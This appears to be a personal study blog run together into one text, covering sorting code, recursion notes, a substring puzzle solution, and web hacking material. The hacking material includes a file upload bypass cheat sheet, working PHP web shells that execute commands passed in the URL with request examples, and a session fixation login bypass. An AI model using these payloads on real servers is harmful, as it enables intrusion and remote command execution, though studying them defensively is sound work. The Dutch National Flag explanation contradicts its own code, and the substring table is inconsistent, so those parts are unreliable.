    public static void quickSortRecur(int[] input, int left, int right) {

        // Exit condition for quick sort
        if (left >= right) {
            return;
        }

        // Partition around the pivot and return its position
        int pivotPos = partition(input, left, right);

        // Recursively sort the left part
        quickSortRecur(input, left, pivotPos);
        // Recursively sort the right part
        quickSortRecur(input, pivotPos + 1, right);
    }

    public static void swap(int[] input, int a, int b) {
        if (a != b) {
            int temp = input[a];
            input[a] = input[b];
            input[b] = temp;
        }
    }

    public static int partition(int[] input, int left, int right) {
        int pivot = input[left];
        int i = left - 1;
        int j = right + 1;

        while (true) {
            do {
                ++i;
            } while (input[i] < pivot);

            do {
                --j;
            } while (input[j] > pivot);

            if (i >= j) {
                return j;
            }

            swap(input, i, j);
        }
    }

Cyber Security: File Upload Cheet Sheet

File Upload Bypass Methods

NULL Byte Bypass

webshell.php%00.jpg

By inserting a NULL Byte in the middle, as in webshell.php%00.jpg, the processed filename becomes "webshell.php." The NULL Byte signifies the end of a string.

HTML Encoding

In cases where other methods don't work well, you can use HTML Encoding, such as webshell.ph%70, as a simple solution.

Hidden Extensions in PHP

This content is specific to PHP7 and does not apply to PHP5.

In PHP7, there are several additional extensions recognized besides ".php":

.php  .php3  .php4  .php5  .php7  .pht  .phtml  .htm  .html

Hidden Extensions in JSP

.war

Adding a Dot After the Extension

Uploaded files typically ignore symbols like "." after the extension. However, the code that checks during upload can recognize extensions only when this symbol is used.

.php.. .php...

Bypass by Modifying Content-type

When processing files, HTTP uses different Content-types based on the file type. For example:

• jpg uses image/jpg
• png uses image/png
• txt uses text/plain
• php uses text/html

If the server filters using Content-type (blocking text/html), it's possible to bypass by using a proxy tool to modify the Content-type.

Content-Disposition: form-data; name="file"; filename="webshell.php"
Content-Type: image/jpeg

Cyber Security: What is File Upload

Definition

File upload attacks involve malicious users uploading files to web applications or websites to exploit security vulnerabilities. Typically, web shell files are uploaded.

Cyber Security: What is Web Shell

List of Vulnerable Points

• Types of uploadable files
• Cases where the uploaded file path is visible and executable

Vulnerability Verification Methods

• Boards with file upload functionality
• Accessing the user's profile page while logged out

Cyber Security: File Upload Cheet Sheet

Attack Methods

Attack Sequence

1. The attacker utilizes the web application's file upload functionality to upload a file.
2. Determine what types of files are allowed (php, png, jpg, etc.).
3. Verify where the uploaded file is stored on the server and if the file path is exposed.
4. Check if the exposed path allows access to the file via the GET method.
5. Use the upload attack to extract desired information.

File Upload Structure

File Upload Attack Process

Web Shell File Upload Process

1. File Selection: Choose a web shell file.
2. File Upload Request: Server allows php files as web shell files.
3. File Validation: Passes validation checks.
4. File Information Storage: Web shell file is stored.
5. Convey Storage Result: Attacker receives desired information through the web shell.

Countermeasures

• Strengthen File Format Validation: Validate the uploaded file's format to only allow approved file types.
• File Name Verification: Check file names for validity to block malicious file names.
• File Size Limitation: Set file size limits to prevent attackers from uploading large files that could deplete server resources.
• Tighten Security Policies: Restrict the storage location and permissions of uploaded files on the server, and strictly apply security policies to disallow uploading executable files.
• Post-Upload Event Verification: Validate post-upload events on the server to detect malicious actions and prevent unauthorized access.

Cyber Security: What is Web Shell

Definition

A Web Shell is an application or script used to remotely control web servers through a web-based interface. Web shells come in various forms and versions with different functionalities. They are typically written in various web languages such as PHP, ASP, JSP, and more. By using a web shell, users can perform various system tasks, including exploring the web server's file system, executing commands, and accessing databases.

Web Shells in Hacking

Web shells can be utilized by attackers as tools to gain access to web servers for malicious purposes. Malicious scripts can be uploaded and executed on the web server, enabling attackers to execute system commands and take control remotely. In essence, a web shell opens a shell on a website, allowing requests received through the web to be directed towards the operating system.

While legitimate use cases for web shells do exist, due to their potential for misuse, web application developers and administrators need to implement security measures and vulnerability analysis to prevent their misuse.

Web shell attacks are often referred to as file upload attacks.

Cyber Security: What is File Upload

What is a Shell?

A shell is an interface used for interaction between a computer user and an operating system (OS).

Shells provide a text-based environment where users can input and execute commands.

Commonly used shells include Bash (Bourne Again SHell) on Unix and Linux systems, and Command Prompt or PowerShell on Windows systems.

Examples

PHP Web Shell Code

After uploading a PHP file containing the following code and identifying the uploaded file's path, you can insert the parameter "cmd":

<?php echo system($_GET['cmd']);?>

<?php
  if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
  }
?>

example.com/files/webshell.php?cmd=find+../../../../+-name+"flag.txt"

import requests
payload = {
    'cmd': 'whoami'
}
response = requests.get('example.com/files/webshell.php', params=payload)

print(response.text)

What is Dutch National Flag algorithm

Definition

The Dutch National Flag algorithm is an algorithm used to sort an array consisting of 0s and 1s.

Scenarios to Consider

• When an array contains 0s and 1s and you want to sort them to distinguish between the two.
• When you want to sort the elements of an array in-place without using additional memory.

Cases where it should not be used

The Dutch National Flag algorithm can only be used to sort arrays consisting of 0s and 1s. For sorting other types of elements, a different algorithm should be used.

Advantages

• It can sort an array in-place without using additional memory.
• Time complexity: O(n)
• Space complexity: O(1)

Disadvantages

• It can only be applied to arrays consisting of 0s and 1s, making it unsuitable for sorting other types of elements.
• It can only sort two types of elements (0s and 1s), so modifications are needed if other types of elements are introduced.

Implementation Steps

1. Initialize the first pointer (low) at the beginning of the array, and the second (mid) and third (high) pointers at the end of the array.
2. Repeat the following steps while the mid pointer is less than or equal to the high pointer:
   • Based on the value of arr[mid], perform the following actions:
     • If it's 0: Swap the values of arr[low] and arr[mid], and increment low and mid by 1.
     • If it's 1: Increment the mid pointer by 1.
     • If it's 2: Swap the values of arr[mid] and arr[high], and decrement high by 1.
3. Return the sorted array.

Example

The following is an example Java implementation of the Dutch National Flag algorithm:

public class DutchNationalFlagAlgorithm {
    public static void dutchNationalFlagSort(int[] nums) {
        int low = 0;  // Pointer for 0
        int mid = 0;  // Pointer for 1
        int high = nums.length - 1;  // Pointer for 2

        while (mid <= high) {
            if (nums[mid] == 0) {
                // Swap the current element with the low pointer element
                swap(nums, low, mid);
                low++;
                mid++;
            } else if (nums[mid] == 1) {
                // Move the mid pointer
                mid++;
            } else if (nums[mid] == 2) {
                // Swap the current element with the high pointer element
                swap(nums, mid, high);
                high--;
            }
        }
    }

    private static void swap(int[] nums, int i, int j) {
        int temp = nums[i];
        nums[i] = nums[j];
        nums[j] = temp;
    }
}

How to Implement Recursive Functions

How to Implement Recursive Functions

Converting all loops into recursive functions is possible, but it's generally a challenging task. The reason behind this is that the mindset required for recursive functions can differ somewhat from the usual human thinking process. Therefore, acquiring this skill requires sufficient practice and familiarity.

To overcome this, I believe that organizing loops effectively is key. I've created the following table as a tool to help with this. Based on this table, I aim to gradually implement more complex loops as recursive functions, with the eventual goal of being able to implement them without relying on the table.

Recursive Function Implementation Table

• Objective:
• Termination Condition (Base Case):
• Do Previous Results Matter?:
• Problem Division (Divide the Problem):
• Combining Results:
• Recursive Call, Modifications Before Moving to the Next Step:

Practice Examples

Reverse a String Recursive Function Implementation Table

• Objective: Reverse a string

• Termination Condition (Base Case): When there are no more characters to reverse (i.e., when the length of the string becomes 0)

  if len(s) == 0: return s
  

• Do Previous Results Matter?: Yes, each recursive call reverses the remaining part of the string

• Problem Division (Divide the Problem): Reversing the rest of the string, excluding the first character

  string - s[-1]
  

• Combining Results:

  stringbuilder sb.append s[-1]
  

• Recursive Call, Modifications Before Moving to the Next Step: Concatenate the current character to the end of the reversed remaining string from the recursive call

  return reverse_string(s[1:], sb)
  

Completed Code

public static String reverseString(String input, StringBuilder sb){

        if(input.length()==0) return sb.toString();

        sb.append(input.charAt(input.length()-1));
        return reverseString(input.substring(0, input.length()-1),sb);
}

Factorial Recursive Function Implementation Table

• Objective: Calculate factorial

• Termination Condition (Base Case):

  if n == 0 or n == 1:
          return 1
  

• Do Previous Results Matter?: Yes

• Problem Division (Divide the Problem):

  factorial(input-1) * input
  

• Combining Results:

  factorial(input-1) * input
  

• Recursive Call, Modifications Before Moving to the Next Step:

  input-1
  

Completed Code

public static int factorial(int n) {
        if (n <= 1) {
            return 1;
        }
        return n * factorial(n - 1);
}

improve

public static int factorial(int n) {
        return factorialRecur(n, 1);
}

private static int factorialRecur(int n, int result) {
        if (n <= 1) {
            return result;
        }
        return factorialRecur(n - 1, n * result);
}

Web Hacking Practice: Session Fixation Attack

Login Screen

Login Attempt Request

Login Complete

The above website issues a session before login and verifies the ID and password received during the login attempt request.

In other words, the website follows this flow: Issuing a session ID (unauthenticated) → Login authentication → Using the authenticated session ID. Therefore, it is possible to bypass the login process.

Fake Login Attempt

By using Burp Suite's Repeater, the ID is changed to "admin" in the request and sent. Naturally, the response will be "fail," but since the user ID on the server-side has already been changed during the authentication process, and the session ID is already authenticated, resending the request from the "Login Complete" state will result in being logged in and the ID will be changed.

GFG Count the Substrings Java Solution

Problem

Problem_Link

Solution Approach

• Condition: Substrings with an equal number of uppercase and lowercase letters
• If the difference between the uppercase and lowercase letters at the starting and ending positions of a specific substring is the same, then that substring satisfies the condition.

Example: “AbaBBa”

• The total number of substrings for the given example is 21, and the number of substrings that meet the condition is 7.
• To calculate the uppercase-lowercase difference, we use +1 for uppercase and -1 for lowercase letters.
• The starting point has no uppercase-lowercase difference, so it is 0.

Index	None	0	1	2	3	4	5
Element	Start	A	b	a	B	B	a
Uppercase-Lowercase Difference	0	1	0	-1	0	1	0

Substrings with the same uppercase-lowercase difference are considered satisfying the condition.

Substring	Index	Uppercase-Lowercase Difference
Ab	None~2	0
aB	2~4	0
Ba	4~6	0
AbaB	None~4	0
baBB	1~5	0
aBBa	2~6	0
AbaBBa	1~5	1

• The first index is not included, and the last index is included. This is because the starting point is 0, and there is no index for it.

Time Complexity: O(n), Space Complexity: O(n)

import java.util.HashMap;
import java.util.Map;

public class BalancedSubstring {
    public static void main(String[] args) {
        String S = "AbaBBa";
        System.out.println(countSubstring(S));
    }

    public static int countSubstring(String S) {
        int n = S.length();
        int count = 0;
        int diff = 0;
        Map<Integer, Integer> diffMap = new HashMap<>();

        // Initialize diffMap with difference 0
        diffMap.put(0, 1);

        for (int i = 0; i < n; i++) {
            char c = S.charAt(i);

            // Update the uppercase-lowercase difference
            if (Character.isUpperCase(c)) {
                diff++;
            } else if (Character.isLowerCase(c)) {
                diff--;
            }

            // Increase count based on previously encountered difference
            // If the current difference was encountered before, it means there exists a substring with equal counts of uppercase and lowercase letters
            count += diffMap.getOrDefault(diff, 0);

            // Update the current difference and its count in the diffMap
            diffMap.put(diff, diffMap.getOrDefault(diff, 0) + 1);
        }

        return count;
    }
}

Explanation

1. First, initialize a diffMap HashMap. This map is used to store the difference between the counts of uppercase and lowercase letters. Since the initial difference is 0, we add (0, 1) to the map.
2. Use a for loop to iterate through the input string S. The loop runs from index 0 to one less than the length of the string.
3. Retrieve the character c at the current index and determine if it is uppercase or lowercase. If it's uppercase, increment the diff variable by 1; if it's lowercase, decrement diff by 1.
4. If the current difference diff has been encountered before, it means there exists a substring with an equal number of uppercase and lowercase letters. Therefore, add the count of such substrings to the count variable. If the difference hasn't been encountered before, use the getOrDefault method to retrieve 0.
5. Update the diffMap using the current difference diff. If diff already exists in the map, increment its count by 1; if not, add the new difference to the map with a count of 1.
6. After the for loop finishes, return the value stored in count. This value represents the number of substrings that meet the condition of having an equal number of uppercase and lowercase letters.